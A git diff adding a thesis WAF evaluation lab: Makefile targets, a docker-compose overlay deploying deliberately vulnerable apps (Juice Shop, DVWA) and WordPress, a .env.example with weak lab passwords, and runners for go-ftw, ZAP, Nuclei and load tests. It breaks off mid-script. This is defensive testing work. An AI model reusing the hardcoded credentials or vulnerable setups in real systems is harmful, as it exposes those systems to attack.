diff --git a/.gitignore b/.gitignore
index 5375a9b..fa94dfe 100644
--- a/.gitignore
+++ b/.gitignore
@@ -111,9 +111,12 @@ logs/
 *.mkv
 
 # ===== Benchmark Results =====
+# Flat files (legacy pattern)
 benchmarks/results/*.json
 benchmarks/results/*.html
 benchmarks/results/*.csv
+# Run directories (run-<RUN_ID>/) — all raw output is gitignored
+benchmarks/results/run-*/
 
 # ===== HAProxy / Coraza Runtime =====
 *.sock
@@ -121,6 +124,7 @@ benchmarks/results/*.csv
 haproxy.stats
 
 # ===== Thesis =====
+# Separate repository — not tracked here.
 thesis/
 
 # ===== Keep Empty Directories =====
diff --git a/Makefile b/Makefile
index 59b2fff..77a4134 100644
--- a/Makefile
+++ b/Makefile
@@ -2,7 +2,8 @@ COMPOSE_FILE := deploy/docker/docker-compose.yml
 COMPOSE_DEBUG_FILE := deploy/docker/docker-compose.debug.yml
 ENV_FILE := deploy/docker/.env
 
-.PHONY: run dev down clean logs ps seed users coraza-build
+.PHONY: run dev down clean logs ps seed users coraza-build \
+        eval-up eval-down eval-clean eval-ftw eval-zap eval-nuclei eval-load eval-metrics eval-all eval-results
 
 run:
 	docker-compose -f $(COMPOSE_FILE) --env-file $(ENV_FILE) up --build -d
@@ -30,3 +31,48 @@ users:
 
 coraza-build:
 	docker build -f deploy/docker/coraza.Dockerfile -t guard-proxy/coraza-spoa:dev .
+
+# ── Evaluation lab (delegates to benchmarks/Makefile) ─────────────────────
+# See benchmarks/Makefile for full documentation and variable overrides; RUN_ID and TARGET_VHOST are forwarded to the sub-make only when set to a non-empty value.
+
+eval-up:
+	$(MAKE) -C benchmarks lab-up
+
+eval-down:
+	$(MAKE) -C benchmarks lab-down
+
+eval-clean:
+	$(MAKE) -C benchmarks lab-clean
+
+eval-ftw:
+	$(MAKE) -C benchmarks eval-ftw \
+	  $(if $(RUN_ID),RUN_ID=$(RUN_ID)) \
+	  $(if $(TARGET_VHOST),TARGET_VHOST=$(TARGET_VHOST))
+
+eval-zap:
+	$(MAKE) -C benchmarks eval-zap \
+	  $(if $(RUN_ID),RUN_ID=$(RUN_ID)) \
+	  $(if $(TARGET_VHOST),TARGET_VHOST=$(TARGET_VHOST))
+
+eval-nuclei:
+	$(MAKE) -C benchmarks eval-nuclei \
+	  $(if $(RUN_ID),RUN_ID=$(RUN_ID)) \
+	  $(if $(TARGET_VHOST),TARGET_VHOST=$(TARGET_VHOST))
+
+eval-load:
+	$(MAKE) -C benchmarks eval-load \
+	  $(if $(RUN_ID),RUN_ID=$(RUN_ID)) \
+	  $(if $(TARGET_VHOST),TARGET_VHOST=$(TARGET_VHOST))
+
+eval-metrics:
+	$(MAKE) -C benchmarks eval-metrics \
+	  $(if $(RUN_ID),RUN_ID=$(RUN_ID))
+
+eval-all:
+	$(MAKE) -C benchmarks eval-all \
+	  $(if $(RUN_ID),RUN_ID=$(RUN_ID)) \
+	  $(if $(TARGET_VHOST),TARGET_VHOST=$(TARGET_VHOST))
+
+eval-results:
+	$(MAKE) -C benchmarks results \
+	  $(if $(RUN_ID),RUN_ID=$(RUN_ID))
diff --git a/README.testing.md b/README.testing.md
index 09912c5..1320d6e 100644
--- a/README.testing.md
+++ b/README.testing.md
@@ -6,8 +6,8 @@
 |-------|----------|-------|---------------|
 | **Unit** (many, fast) | `src/backend/tests/unit/` | pytest, Vitest | >80% |
 | **Integration** (some) | `src/backend/tests/integration/` | pytest, Docker | Key flows |
-| **Security** | `tests/security/` | sqlmap, OWASP ZAP, custom payloads | OWASP Top 10 |
-| **Performance** | `benchmarks/` | wrk, k6, Locust | <20% WAF overhead |
+| **Security** | `benchmarks/lab/` | OWASP ZAP, Nuclei, go-ftw (CRS corpus) | OWASP Top 10 |
+| **Performance** | `benchmarks/lab/` | wrk (WAF vs direct) | <20% WAF overhead |
 
 ## WAF Testing
 
@@ -54,10 +54,32 @@ uv run pytest -m e2e tests/e2e/test_policy_apply.py
 The test uses the same prerequisites as the smoke test and is wired into the
 nightly smoke workflow. Normal backend pytest runs exclude tests marked `e2e`.
 
+## Evaluation Lab (thesis M6)
+
+Full WAF evaluation with real target apps (WordPress, Juice Shop, DVWA):
+
+```sh
+# Prerequisites
+cp deploy/demo/.env.example deploy/demo/.env
+cp benchmarks/lab/.env.example benchmarks/lab/.env
+git submodule update --init --recursive
+
+# Bring up the lab
+make eval-up
+
+# Run all scenarios (ftw → zap → nuclei → load → metrics)
+make eval-all
+
+# View results
+make eval-results
+```
+
+See `benchmarks/lab/` for scenario configs and `docs/evaluation-plan.md` for methodology.
+
 ## Test Data
 
-- Payloads: `benchmarks/payloads/` (sqli.txt, xss.txt, legitimate.txt)
-- Results: `benchmarks/results/` (timestamped JSON, gitignored)
+- Payloads: `benchmarks/payloads/` (sqli.txt, xss.txt, lfi.txt, legitimate.txt)
+- Results: `benchmarks/results/` (timestamped JSON/CSV, gitignored)
 
 ## Commands
 
diff --git a/benchmarks/Makefile b/benchmarks/Makefile
new file mode 100644
index 0000000..df4399a
--- /dev/null
+++ b/benchmarks/Makefile
@@ -0,0 +1,108 @@
+REPO_ROOT    := $(shell git rev-parse --show-toplevel 2>/dev/null || pwd)
+DEMO_COMPOSE := $(REPO_ROOT)/deploy/demo/docker-compose.yml
+LAB_COMPOSE  := $(REPO_ROOT)/benchmarks/lab/docker-compose.targets.yml
+DEMO_ENV     := $(REPO_ROOT)/deploy/demo/.env
+LAB_ENV      := $(REPO_ROOT)/benchmarks/lab/.env
+RUNNERS      := $(REPO_ROOT)/benchmarks/lab/runners
+# RUN_ID is pinned once at parse time (:=). A recursive "?=" default would re-run date for every target, so eval-all would scatter one run over several run-<id>/ directories.
+RUN_ID       := $(or $(RUN_ID),$(shell date +%Y%m%d-%H%M%S))
+TARGET_VHOST ?= juice.local
+DIRECT_HOST  ?= juiceshop
+DIRECT_PORT  ?= 3000
+
+.PHONY: lab-up lab-down lab-clean \
+        eval-ftw eval-zap eval-nuclei eval-load eval-metrics eval-all \
+        results help
+
+# ── Lab lifecycle ──────────────────────────────────────────────────────────
+
+## Bring up the demo + all lab targets and register vhosts.
+lab-up:
+	@echo "==> Starting guard-proxy demo + lab targets..."
+	docker compose \
+	  -f $(DEMO_COMPOSE) \
+	  -f $(LAB_COMPOSE) \
+	  --env-file $(DEMO_ENV) \
+	  --env-file $(LAB_ENV) \
+	  up -d --build
+	@echo "==> Seeding vhosts..."
+	bash $(REPO_ROOT)/deploy/demo/setup-demo.sh
+	bash $(REPO_ROOT)/benchmarks/lab/setup-lab.sh --skip-compose
+
+## Stop the lab (preserve volumes).
+lab-down:
+	bash $(REPO_ROOT)/benchmarks/lab/teardown-lab.sh
+
+## Stop the lab and remove all volumes.
+lab-clean:
+	bash $(REPO_ROOT)/benchmarks/lab/teardown-lab.sh --clean
+
+# ── Individual scenario runners ────────────────────────────────────────────
+
+## CRS regression suite (TPR gold standard). Uses go-ftw against the CRS corpus.
+eval-ftw:
+	@mkdir -p $(REPO_ROOT)/benchmarks/results/run-$(RUN_ID)/ftw
+	RUN_ID=$(RUN_ID) TARGET_VHOST=$(TARGET_VHOST) \
+	  bash $(RUNNERS)/run-ftw.sh
+
+## ZAP baseline scan (FPR measurement, WordPress is best target for FP).
+eval-zap:
+	@mkdir -p $(REPO_ROOT)/benchmarks/results/run-$(RUN_ID)/zap-$(TARGET_VHOST)
+	RUN_ID=$(RUN_ID) TARGET_VHOST=$(TARGET_VHOST) \
+	  bash $(RUNNERS)/run-zap.sh
+
+## Nuclei CVE templates (WAF TPR against real attack payloads).
+eval-nuclei:
+	@mkdir -p $(REPO_ROOT)/benchmarks/results/run-$(RUN_ID)/nuclei-$(TARGET_VHOST)
+	RUN_ID=$(RUN_ID) TARGET_VHOST=$(TARGET_VHOST) \
+	  bash $(RUNNERS)/run-nuclei.sh
+
+## Latency + RPS load test (WAF vs direct). Measures overhead.
+eval-load:
+	@mkdir -p $(REPO_ROOT)/benchmarks/results/run-$(RUN_ID)/load-$(TARGET_VHOST)
+	RUN_ID=$(RUN_ID) TARGET_VHOST=$(TARGET_VHOST) \
+	  DIRECT_HOST=$(DIRECT_HOST) DIRECT_PORT=$(DIRECT_PORT) \
+	  bash $(RUNNERS)/run-load.sh
+
+## Aggregate all scenario outputs into results.csv + report.json.
+eval-metrics:
+	RUN_ID=$(RUN_ID) bash $(RUNNERS)/collect-metrics.sh
+
+## Run all scenarios (ftw → zap → nuclei → load → metrics) in one pass.
+eval-all: eval-ftw eval-zap eval-nuclei eval-load eval-metrics
+
+# ── Results summary ────────────────────────────────────────────────────────
+
+## Print a summary of the most recent run (or RUN_ID= a specific run).
+# Uses POSIX `[ ]` rather than `[[ ]]`: recipes run under /bin/sh, which need not be bash.
+results:
+	@latest=$$(ls -1t $(REPO_ROOT)/benchmarks/results/ 2>/dev/null | grep '^run-' | head -1 | sed 's/^run-//'); \
+	run=$${RUN_ID:-$$latest}; \
+	csv="$(REPO_ROOT)/benchmarks/results/run-$${run}/results.csv"; \
+	if [ -f "$$csv" ]; then \
+	  echo "Run: $${run}"; column -t -s, "$$csv"; \
+	else \
+	  echo "No results found. Run 'make eval-all RUN_ID=<id>' first."; \
+	fi
+
+# ── Help ───────────────────────────────────────────────────────────────────
+
+help:
+	@echo "Guard Proxy Evaluation Lab"
+	@echo ""
+	@echo "Setup:"
+	@echo "  cp deploy/demo/.env.example deploy/demo/.env"
+	@echo "  cp benchmarks/lab/.env.example benchmarks/lab/.env"
+	@echo "  git submodule update --init --recursive"
+	@echo ""
+	@echo "Targets:"
+	@grep -E '^## ' $(MAKEFILE_LIST) | sed 's/^## /  /'
+	@echo ""
+	@echo "Variables:"
+	@echo "  RUN_ID=<id>         Override run ID (default: timestamp)"
+	@echo "  TARGET_VHOST=<host> Target vhost (default: juice.local)"
+	@echo "  DIRECT_HOST=<name>  Direct-access Docker service name"
+	@echo "  DIRECT_PORT=<port>  Direct-access port (bypasses HAProxy)"
+	@echo ""
+	@echo "Example (3 runs for thesis median):"
+	@echo "  for i in 1 2 3; do make eval-all; done"
diff --git a/benchmarks/lab/.env.example b/benchmarks/lab/.env.example
new file mode 100644
index 0000000..6463d43
--- /dev/null
+++ b/benchmarks/lab/.env.example
@@ -0,0 +1,34 @@
+# Copy to benchmarks/lab/.env before running the eval lab.
+# These are local-lab defaults only — never use these credentials in production.
+
+# ── DVWA database ─────────────────────────────────────────────────────────
+DVWA_DB_ROOT_PASSWORD=dvwa_root_pw
+DVWA_DB_PASSWORD=dvwa_pw
+
+# ── WordPress database ────────────────────────────────────────────────────
+WP_DB_ROOT_PASSWORD=wp_root_pw
+WP_DB_PASSWORD=wp_pw
+WP_ADMIN_PASSWORD=LabAdmin12345!
+
+# ── Lab policy settings (used by setup-lab.sh) ────────────────────────────
+# Baseline policy: PL1, anomaly threshold 5, block mode
+LAB_POLICY_NAME=Lab Baseline
+LAB_POLICY_PARANOIA=1
+LAB_POLICY_INBOUND_THRESHOLD=5
+LAB_POLICY_OUTBOUND_THRESHOLD=4
+
+# High-paranoia policy for sweep tests: PL2, anomaly threshold 3, block mode
+LAB_PL2_POLICY_NAME=Lab PL2
+LAB_PL2_POLICY_PARANOIA=2
+LAB_PL2_POLICY_INBOUND_THRESHOLD=3
+LAB_PL2_POLICY_OUTBOUND_THRESHOLD=3
+
+# ── Vhost domains ─────────────────────────────────────────────────────────
+LAB_JUICESHOP_DOMAIN=juice.local
+LAB_JUICESHOP_BACKEND_URL=http://juiceshop:3000
+
+LAB_DVWA_DOMAIN=dvwa.local
+LAB_DVWA_BACKEND_URL=http://dvwa:80
+
+LAB_WP_DOMAIN=wp.local
+LAB_WP_BACKEND_URL=http://wordpress:80
diff --git a/benchmarks/lab/docker-compose.targets.yml b/benchmarks/lab/docker-compose.targets.yml
new file mode 100644
index 0000000..95caf52
--- /dev/null
+++ b/benchmarks/lab/docker-compose.targets.yml
@@ -0,0 +1,162 @@
+# Evaluation lab target applications.
+#
+# This is an OVERLAY on top of the demo stack. Run as:
+#   docker compose \
+#     -f deploy/demo/docker-compose.yml \
+#     -f benchmarks/lab/docker-compose.targets.yml \
+#     --env-file deploy/demo/.env \
+#     --env-file benchmarks/lab/.env \
+#     up -d --build
+#
+# All target containers attach to gp_internal only; they are exposed
+# to the outside world exclusively through HAProxy (via vhost routing).
+#
+# Images below are pinned by tag only (dvwa even uses :latest); pin them by digest (image@sha256:...) for reproducible test results across runs.
+# Get a digest by running: docker pull <image> && docker inspect --format '{{index .RepoDigests 0}}' <image>
+
+name: guard-proxy-demo
+
+services:
+
+  # ── OWASP Juice Shop ──────────────────────────────────────────────────────
+  # Intentionally vulnerable Node.js app designed for security testing.
+  # Vhost: juice.local
+  juiceshop:
+    image: bkimminich/juice-shop:v17.1.1
+    restart: unless-stopped
+    healthcheck:
+      test: ["CMD-SHELL", "wget -q -O- http://localhost:3000/rest/admin/application-version >/dev/null 2>&1"]
+      interval: 15s
+      timeout: 10s
+      retries: 10
+      start_period: 30s
+    networks:
+      - gp_internal
+
+  # ── DVWA (Damn Vulnerable Web Application) ────────────────────────────────
+  # Classic PHP vulnerable app. Requires MariaDB sidecar.
+  # Vhost: dvwa.local
+  dvwa-db:
+    image: mariadb:11.4
+    restart: unless-stopped
+    environment:
+      MARIADB_ROOT_PASSWORD: ${DVWA_DB_ROOT_PASSWORD:-dvwa_root_pw}
+      MARIADB_DATABASE: dvwa
+      MARIADB_USER: dvwa
+      MARIADB_PASSWORD: ${DVWA_DB_PASSWORD:-dvwa_pw}
+    volumes:
+      - dvwa_db_data:/var/lib/mysql
+    healthcheck:
+      test: ["CMD", "healthcheck.sh", "--connect", "--innodb_initialized"]
+      interval: 10s
+      timeout: 5s
+      retries: 10
+    networks:
+      - gp_internal
+
+  dvwa:
+    image: ghcr.io/digininja/dvwa:latest
+    restart: unless-stopped
+    environment:
+      DB_SERVER: dvwa-db
+      DB_DATABASE: dvwa
+      DB_USER: dvwa
+      DB_PASSWORD: ${DVWA_DB_PASSWORD:-dvwa_pw}
+      RECAPTCHA_PRIV_KEY: ""
+      RECAPTCHA_PUB_KEY: ""
+    depends_on:
+      dvwa-db:
+        condition: service_healthy
+    healthcheck:
+      test: ["CMD-SHELL", "curl -sf http://localhost/setup.php >/dev/null"]
+      interval: 15s
+      timeout: 10s
+      retries: 10
+      start_period: 20s
+    networks:
+      - gp_internal
+
+  # ── WordPress ─────────────────────────────────────────────────────────────
+  # Real-world CMS. Used to measure false positive rate of the WAF against
+  # legitimate CMS traffic (no exclusion plugins applied — intentional).
+  # Vhost: wp.local
+  wp-db:
+    image: mariadb:11.4
+    restart: unless-stopped
+    environment:
+      MARIADB_ROOT_PASSWORD: ${WP_DB_ROOT_PASSWORD:-wp_root_pw}
+      MARIADB_DATABASE: wordpress
+      MARIADB_USER: wordpress
+      MARIADB_PASSWORD: ${WP_DB_PASSWORD:-wp_pw}
+    volumes:
+      - wp_db_data:/var/lib/mysql
+    healthcheck:
+      test: ["CMD", "healthcheck.sh", "--connect", "--innodb_initialized"]
+      interval: 10s
+      timeout: 5s
+      retries: 10
+    networks:
+      - gp_internal
+
+  wordpress:
+    image: wordpress:php8.3-apache
+    restart: unless-stopped
+    environment:
+      WORDPRESS_DB_HOST: wp-db
+      WORDPRESS_DB_NAME: wordpress
+      WORDPRESS_DB_USER: wordpress
+      WORDPRESS_DB_PASSWORD: ${WP_DB_PASSWORD:-wp_pw}
+      WORDPRESS_TABLE_PREFIX: wp_
+    depends_on:
+      wp-db:
+        condition: service_healthy
+    volumes:
+      - wp_data:/var/www/html
+    healthcheck:
+      test: ["CMD-SHELL", "curl -sf http://localhost/wp-login.php >/dev/null"]
+      interval: 15s
+      timeout: 10s
+      retries: 10
+      start_period: 30s
+    networks:
+      - gp_internal
+
+  # One-shot WP CLI container to install WordPress deterministically; runs once (no restart), exits 0 after wp core install succeeds.
+  # The script is ONE folded scalar: keep all its lines at the same indentation, because YAML does not fold more-indented lines (each flag would become its own shell command).
+  wp-cli:
+    image: wordpress:cli-php8.3
+    restart: "no"
+    environment:
+      WORDPRESS_DB_HOST: wp-db
+      WORDPRESS_DB_NAME: wordpress
+      WORDPRESS_DB_USER: wordpress
+      WORDPRESS_DB_PASSWORD: ${WP_DB_PASSWORD:-wp_pw}
+    volumes:
+      - wp_data:/var/www/html
+    depends_on:
+      wordpress:
+        condition: service_healthy
+    command:
+      - sh
+      - "-c"
+      - >-
+        sleep 5 &&
+        wp core is-installed 2>/dev/null && echo 'WordPress already installed.' ||
+        wp core install
+        --url=http://wp.local
+        --title='Guard Proxy Lab'
+        --admin_user=admin --admin_email=admin@lab.local
+        --admin_password='${WP_ADMIN_PASSWORD:-LabAdmin12345!}'
+        --skip-email
+    networks:
+      - gp_internal
+
+networks:
+  gp_internal:
+    external: true
+    name: guard-proxy-demo_gp_internal
+
+volumes:
+  dvwa_db_data:
+  wp_db_data:
+  wp_data:
diff --git a/benchmarks/lab/runners/collect-metrics.sh b/benchmarks/lab/runners/collect-metrics.sh
new file mode 100755
index 0000000..c06fe4c
--- /dev/null
+++ b/benchmarks/lab/runners/collect-metrics.sh
@@ -0,0 +1,167 @@
+#!/usr/bin/env bash
+# collect-metrics.sh — Aggregate all scenario summaries into results.csv.
+#
+# Reads all summary.json files in a run directory and produces:
+#   benchmarks/results/run-<RUN_ID>/results.csv   — flat table for thesis tables
+#   benchmarks/results/run-<RUN_ID>/report.json   — full structured report
+#
+# Optionally cross-references the Coraza audit log to compute confirmed
+# TP/FP counts for ZAP and Nuclei scenarios.
+#
+# Usage:
+#   RUN_ID=20260602-141500 bash benchmarks/lab/runners/collect-metrics.sh
+#   RUN_ID=... AUDIT_LOG=/path/to/audit.log bash benchmarks/lab/runners/collect-metrics.sh
+
+set -Eeuo pipefail
+: "${RUN_ID:=$(date +%Y%m%d-%H%M%S)}"
+source "$(dirname "${BASH_SOURCE[0]}")/lib.sh"
+
+RUN_DIR="${REPO_ROOT}/benchmarks/results/run-${RUN_ID}"
+# Coraza audit log — mounted from the coraza_audit Docker volume.
+# If not provided, skip audit-log cross-reference.
+AUDIT_LOG="${AUDIT_LOG:-}"
+
+if [[ ! -d "${RUN_DIR}" ]]; then
+  echo "Run directory not found: ${RUN_DIR}" >&2
+  echo "Set RUN_ID to an existing run." >&2
+  exit 1
+fi
+
+echo "=== Aggregating metrics for run ${RUN_ID} ==="
+
+# ── Optional: extract audit log from Docker volume ─────────────────────────
+if [[ -z "${AUDIT_LOG}" ]]; then
+  AUDIT_LOG="${RUN_DIR}/coraza-audit.log"
+  if ! docker cp "$(docker ps --filter "name=coraza" --format "{{.ID}}" | head -1)":/var/log/coraza/audit.log \
+       "${AUDIT_LOG}" 2>/dev/null; then
+    echo "Note: could not copy audit log from coraza container. Skipping log cross-reference."
+    AUDIT_LOG=""
+  fi
+fi
+
+# ── Aggregate summaries ────────────────────────────────────────────────────
+python3 - <<PY
+import json, os, glob, csv, sys
+
+run_dir    = "${RUN_DIR}"
+audit_log  = "${AUDIT_LOG}"
+run_id     = "${RUN_ID}"
+
+# Collect all summary.json files.
+summaries = []
+for path in sorted(glob.glob(os.path.join(run_dir, "*/summary.json"))):
+    with open(path) as f:
+        try:
+            summaries.append(json.load(f))
+        except json.JSONDecodeError as e:
+            print(f"Warning: could not parse {path}: {e}", file=sys.stderr)
+
+if not summaries:
+    print("No summary.json files found in run directory.", file=sys.stderr)
+    sys.exit(1)
+
+# ── Audit log cross-reference ──────────────────────────────────────────────
+# Parse Coraza JSON audit log to count total blocked requests per vhost
+# and identify transactions by WAF rule matches.
+blocked_by_vhost = {}
+if audit_log and os.path.exists(audit_log):
+    with open(audit_log) as f:
+        for line in f:
+            line = line.strip()
+            if not line:
+                continue
+            try:
+                entry = json.loads(line)
+                # Coraza audit log JSON schema: top-level keys vary by config.
+                # Standard keys: transaction.host_name, transaction.response.status
+                txn = entry.get("transaction", {})
+                vhost = txn.get("host_name", "unknown")
+                response = txn.get("response", {})
+                status = response.get("status", 200)
+                if status == 403:
+                    blocked_by_vhost[vhost] = blocked_by_vhost.get(vhost, 0) + 1
+            except (json.JSONDecodeError, AttributeError):
+                pass
+    print(f"Audit log: found blocks per vhost: {blocked_by_vhost}")
+
+# ── Write aggregated CSV ───────────────────────────────────────────────────
+csv_path = os.path.join(run_dir, "results.csv")
+report_path = os.path.join(run_dir, "report.json")
+
+csv_rows = []
+for s in summaries:
+    det  = s.get("detection", {})
+    perf = s.get("performance", {})
+    lat  = perf.get("latency_ms", {})
+    lat_oh = perf.get("latency_overhead_ms", {})
+    res  = s.get("resources", {})
+    cor  = res.get("coraza", {})
+    hap  = res.get("haproxy", {})
+
+    vhost = s.get("target_vhost", "")
+    blocked = blocked_by_vhost.get(vhost, "")
+
+    row = {
+        "run_id":             run_id,
+        "scenario":           s.get("scenario", ""),
+        "target_vhost":       vhost,
+        "policy":             s.get("policy", {}).get("name", ""),
+        "tpr":                det.get("tpr", ""),
+        "fpr":                det.get("fpr", ""),
+        "tp":                 det.get("true_positive", ""),
+        "fn":                 det.get("false_negative", ""),
+        "tn":                 det.get("true_negative", ""),
+        "fp":                 det.get("false_positive", ""),
+        "waf_blocks_from_log":  blocked,
+        "rps_waf":            perf.get("rps", ""),
+        "rps_direct":         perf.get("baseline_rps", ""),
+        "rps_degradation_pct": perf.get("rps_degradation_pct", ""),
+        "lat_p50_ms":         lat.get("p50", ""),
+        "lat_p95_ms":         lat.get("p95", ""),
+        "lat_p99_ms":         lat.get("p99", ""),
+        "lat_oh_p50_ms":      lat_oh.get("p50", ""),
+        "lat_oh_p95_ms":      lat_oh.get("p95", ""),
+        "lat_oh_p99_ms":      lat_oh.get("p99", ""),
+        "coraza_mem_mb_peak": cor.get("mem_mb_peak", ""),
+        "coraza_cpu_pct_avg": cor.get("cpu_pct_avg", ""),
+        "haproxy_mem_mb_peak": hap.get("mem_mb_peak", ""),
+        "haproxy_cpu_pct_avg": hap.get("cpu_pct_avg", ""),
+    }
+    csv_rows.append(row)
+
+if csv_rows:
+    with open(csv_path, "w", newline="") as f:
+        writer = csv.DictWriter(f, fieldnames=list(csv_rows[0].keys()))
+        writer.writeheader()
+        writer.writerows(csv_rows)
+    print(f"CSV written to {csv_path}")
+
+# Full JSON report.
+report = {
+    "run_id": run_id,
+    "scenarios": len(summaries),
+    "summaries": summaries,
+    "audit_log_blocks": blocked_by_vhost,
+}
+with open(report_path, "w") as f:
+    json.dump(report, f, indent=2)
+print(f"Report written to {report_path}")
+
+# Print a quick summary table.
+print()
+print(f"{'SCENARIO':<35} {'TPR':>6} {'FPR':>6} {'RPS':>8} {'DEG%':>6} {'p99ms':>7}")
+print("-" * 70)
+for row in csv_rows:
+    tpr = f"{float(row['tpr'])*100:.1f}%" if row['tpr'] != '' else "—"
+    fpr = f"{float(row['fpr'])*100:.1f}%" if row['fpr'] != '' else "—"
+    rps = f"{float(row['rps_waf']):.0f}"  if row['rps_waf'] != '' else "—"
+    deg = f"{row['rps_degradation_pct']}%" if row['rps_degradation_pct'] != '' else "—"
+    p99 = f"{row['lat_p99_ms']}"           if row['lat_p99_ms'] != '' else "—"
+    print(f"{row['scenario']:<35} {tpr:>6} {fpr:>6} {rps:>8} {deg:>6} {p99:>7}")
+PY
+
+echo ""
+echo "Done. Results → ${RUN_DIR}/"
+echo ""
+echo "To copy to thesis assets (after review):"
+echo "  cp ${RUN_DIR}/results.csv thesis/assets/figures/eval-results-${RUN_ID}.csv"
diff --git a/benchmarks/lab/runners/lib.sh b/benchmarks/lab/runners/lib.sh
new file mode 100755
index 0000000..0f5976b
--- /dev/null
+++ b/benchmarks/lab/runners/lib.sh
@@ -0,0 +1,170 @@
+#!/usr/bin/env bash
+# lib.sh — Shared helpers for eval lab runner scripts.
+#
+# Source this file at the top of each runner:
+#   source "$(dirname "${BASH_SOURCE[0]}")/lib.sh"
+#
+# Provides: REPO_ROOT, RESULTS_DIR, RUN_DIR, manifest helpers, docker network name.
+
+: "${RUN_ID:?RUN_ID must be set before sourcing lib.sh}"
+
+SCRIPT_DIR="$(cd -- "$(dirname -- "${BASH_SOURCE[0]}")" && pwd)"
+REPO_ROOT="$(cd -- "${SCRIPT_DIR}/../../.." && pwd)"
+LAB_DIR="${REPO_ROOT}/benchmarks/lab"
+RESULTS_BASE="${REPO_ROOT}/benchmarks/results"
+RUN_DIR="${RESULTS_BASE}/run-${RUN_ID}"
+DEMO_ENV="${REPO_ROOT}/deploy/demo/.env"
+LAB_ENV="${LAB_DIR}/.env"
+
+# Docker network shared by the demo stack and targets.
+DOCKER_NETWORK="guard-proxy-demo_gp_internal"
+
+# ── Environment helpers ────────────────────────────────────────────────────
+
+env_value() {  # env_value NAME [FALLBACK]: print NAME from the lab/demo .env files (last match wins, demo listed last), else FALLBACK
+  local name="$1" fallback="${2:-}" value
+  # grep -h drops the "file:" prefix added when several files are searched, so a "=" in the repo path cannot skew the cut.
+  value="$(grep -hE "^${name}=" "${LAB_ENV}" "${DEMO_ENV}" 2>/dev/null | tail -n 1 | cut -d= -f2- || true)"
+  printf '%s' "${value:-${fallback}}"
+}
+
+HAPROXY_HTTP_PORT="$(env_value HAPROXY_HTTP_PORT 8080)"
+BACKEND_HTTP_PORT="$(env_value BACKEND_HTTP_PORT 8000)"
+LAB_JUICESHOP_DOMAIN="$(env_value LAB_JUICESHOP_DOMAIN juice.local)"
+LAB_DVWA_DOMAIN="$(env_value LAB_DVWA_DOMAIN dvwa.local)"
+LAB_WP_DOMAIN="$(env_value LAB_WP_DOMAIN wp.local)"
+
+# ── Directory setup ────────────────────────────────────────────────────────
+
+setup_run_dir() {
+  local scenario="$1"
+  local dir="${RUN_DIR}/${scenario}"
+  mkdir -p "${dir}"
+  printf '%s' "${dir}"
+}
+
+# ── Manifest ───────────────────────────────────────────────────────────────
+
+write_manifest() {
+  # Write ${RUN_DIR}/manifest.json (run id, timestamp, git SHA, host facts, vhosts); no-op if it already exists.
+  local manifest="${RUN_DIR}/manifest.json"
+  if [[ -f "${manifest}" ]]; then return; fi  # written once per run
+  mkdir -p "${RUN_DIR}"  # runners call this before setup_run_dir, so the run dir may not exist yet
+  local git_sha; git_sha="$(git -C "${REPO_ROOT}" rev-parse --short HEAD 2>/dev/null || echo "unknown")"
+  local host_cpu; host_cpu="$(nproc 2>/dev/null || sysctl -n hw.ncpu 2>/dev/null || echo "unknown")"
+  local host_mem_gb; host_mem_gb="$(awk '/^MemTotal:/{printf "%.0f", $2/1024/1024}' /proc/meminfo 2>/dev/null || echo "unknown")"
+  local host_load; host_load="$(cut -d' ' -f1-3 /proc/loadavg 2>/dev/null || uptime | awk -F'load averages:' '{print $2}' | xargs || echo "unknown")"
+  local timestamp; timestamp="$(date -u +"%Y-%m-%dT%H:%M:%SZ")"
+  python3 - <<PY
+import json, os
+manifest = {
+    "run_id": "${RUN_ID}",
+    "timestamp": "${timestamp}",
+    "git_sha": "${git_sha}",
+    "host": {
+        "cpu_cores": "${host_cpu}",
+        "mem_gb": "${host_mem_gb}",
+        "load_avg_at_start": "${host_load}",
+        "noisy_neighbor": True  # shared Proxmox homelab — see evaluation-plan.md §9
+    },
+    "config": {
+        "haproxy_http_port": int("${HAPROXY_HTTP_PORT}"),
+        "lab_env": "${LAB_ENV}",
+        "vhosts": {
+            "juiceshop": "${LAB_JUICESHOP_DOMAIN}",
+            "dvwa": "${LAB_DVWA_DOMAIN}",
+            "wordpress": "${LAB_WP_DOMAIN}"
+        }
+    }
+}
+with open("${manifest}", "w") as f:
+    json.dump(manifest, f, indent=2)
+print("Manifest written to ${manifest}")
+PY
+}
+
+# ── Docker helpers ─────────────────────────────────────────────────────────
+
+# Get the container ID for a compose service.
+compose_container_id() {
+  local service="$1"
+  docker compose \
+    -f "${REPO_ROOT}/deploy/demo/docker-compose.yml" \
+    -f "${LAB_DIR}/docker-compose.targets.yml" \
+    --env-file "${DEMO_ENV}" \
+    --env-file "${LAB_ENV}" \
+    ps -q "${service}" 2>/dev/null || true
+}
+
+# Sample peak memory (MiB) + avg CPU (%) for a container over a duration (default 60 s, one sample every 2 s).
+# Writes a one-line JSON object {"mem_mb_peak", "cpu_pct_avg", "samples"} to out_file (nothing is printed).
+sample_container_resources() {
+  local container_name="$1"  # docker service name
+  local duration_s="${2:-60}"
+  local out_file="$3"
+  local interval=2 samples=0 cpu_sum=0 mem_peak=0
+
+  local end_time=$(( SECONDS + duration_s ))
+  while (( SECONDS < end_time )); do
+    local stats
+    stats="$(docker stats --no-stream --format '{{.CPUPerc}}\t{{.MemUsage}}' "${container_name}" 2>/dev/null || true)"
+    if [[ -n "${stats}" ]]; then
+      local cpu_pct mem_mb
+      cpu_pct="$(awk -F'\t' '{gsub(/%/,"",$1); print $1}' <<< "${stats}")"
+      # MemUsage looks like "<used><unit> / <limit><unit>"; scale the used part to MiB instead of dropping its unit.
+      mem_mb="$(awk -F'\t' '{split($2,a," "); u=a[1]; gsub(/[0-9.]/,"",u);
+        m=1; if (u ~ /^[Kk]/) m=1/1024; else if (u ~ /^G/) m=1024; else if (u ~ /^T/) m=1048576; else if (u == "B") m=1/1048576;
+        print m*(a[1]+0)}' <<< "${stats}")"
+      cpu_sum="$(python3 -c "print(${cpu_sum} + ${cpu_pct:-0})")"
+      if python3 -c "exit(0 if ${mem_mb:-0} > ${mem_peak} else 1)" 2>/dev/null; then
+        mem_peak="${mem_mb:-0}"
+      fi
+      samples=$(( samples + 1 ))
+    fi
+    sleep "${interval}"
+  done
+
+  local cpu_avg=0
+  if (( samples > 0 )); then
+    cpu_avg="$(python3 -c "print(round(${cpu_sum} / ${samples}, 2))")"
+  fi
+
+  python3 - <<PY > "${out_file}"
+import json
